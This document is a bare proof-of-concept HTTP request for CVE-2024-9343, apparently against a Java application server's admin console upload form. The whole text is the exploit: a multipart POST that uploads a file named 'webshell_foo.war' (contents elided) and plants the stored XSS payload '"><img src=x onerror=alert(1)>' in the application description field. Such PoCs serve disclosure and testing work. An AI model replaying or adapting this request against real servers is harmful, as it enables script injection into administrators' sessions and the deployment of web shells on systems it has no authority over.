CVE-2024-9343

POST /common/applications/uploadFrame.jsf?form:title2:bottomButtons:uploadButton=Processing...&bare=false HTTP/1.1

Host: [IP]:[PORT]

Cookie: […]

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Content-Type: multipart/form-data; boundary=---------------------------74657258217273412031077623017

Content-Length: 8343

Origin: https://[IP]:[PORT]

Referer: https://[IP]:[PORT]/common/applications/uploadFrame.jsf

Upgrade-Insecure-Requests: 1

Sec-Fetch-Dest: iframe

Sec-Fetch-Mode: navigate

Sec-Fetch-Site: same-origin

Sec-Fetch-User: ?1

Te: trailers

Connection: close

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:sheet1:section1:prop1:hiddenText"

required

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="uploadRdBtn"

client

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:sheet1:section1:prop1:fileupload"; filename="webshell_foo.war"

Content-Type: application/octet-stream

[...]

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:sheet1:section1:prop1:fileupload_com.sun.webui.jsf.uploadParam"

form:sheet1:section1:prop1:fileupload

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:sheet1:section1:prop1:extension"

.war

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:sheet1:section1:prop1:action"

client

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:sheet1:sun_propertySheetSection223:type:appType"

war

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:appClient:psection:nameProp:appName"

xss-stored

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:appClient:psection:implicitCdi:implicitCdi"

true

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:appClient:psection:jw:jwt"

true

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:appClient:psection:deploymentOrder:deploymentOrder"

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:appClient:psection:descriptionProp:description"

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:ear:psection:nameProp:appName"

xss-stored

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:ear:psection:enableProp:sun_checkbox236"

true

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:ear:psection:implicitCdi:implicitCdi"

true

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:ear:psection:jw:jwc"

true

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:ear:psection:deploymentOrder:deploymentOrder"

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:ear:psection:librariesProp:library"

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:ear:psection:descriptionProp:description"

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:jar:psection:nameProp:appName"

xss-stored

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:jar:psection:enableProp:sun_checkbox238"

true

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:jar:psection:implicitCdi:implicitCdi"

true

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:jar:psection:deploymentOrder:deploymentOrder"

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:jar:psection:librariesProp:library"

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:jar:psection:descriptionProp:description"

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:rar:psection:nameProp:appName"

xss-stored

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:rar:psection:enableProp:sun_checkbox240"

true

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:rar:psection:implicitCdi:implicitCdi"

true

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:rar:psection:deploymentOrder:deploymentOrder"

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:rar:psection:descriptionProp:description"

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:war:psection:cxp:ctx"

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:war:psection:nameProp:appName"

xss-stored

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:war:psection:enableProp:sun_checkbox242"

true

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:war:psection:implicitCdi:implicitCdi"

true

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:war:psection:deploymentOrder:deploymentOrder"

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:war:psection:librariesProp:library"

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:war:psection:descriptionProp:description"

"><img src=x onerror=alert(1)>

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:other:psection:nameProp:appName"

xss-stored

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:other:psection:enableProp:sun_checkbox244"

true

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:other:psection:implicitCdi:implicitCdi"

true

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:other:psection:deploymentOrder:deploymentOrder"

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:other:psection:librariesProp:library"

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:other:psection:descriptionProp:description"

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:targetSection:targetSectionId:addRemoveProp:commonAddRemove_item_list"

|server|foo3|foo4|xss-stored|xss|com.sun.webui.jsf.separator|

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form:targetSection:targetSectionId:addRemoveProp:commonAddRemove_list_value"

server

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="form_hidden"

form_hidden

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="jakarta.faces.ViewState"

2595358235104407692:-2890977101667147833

-----------------------------74657258217273412031077623017

Content-Disposition: form-data; name="com_sun_webui_util_FocusManager_focusElementId"

form:title2:bottomButtons:uploadButton

-----------------------------74657258217273412031077623017--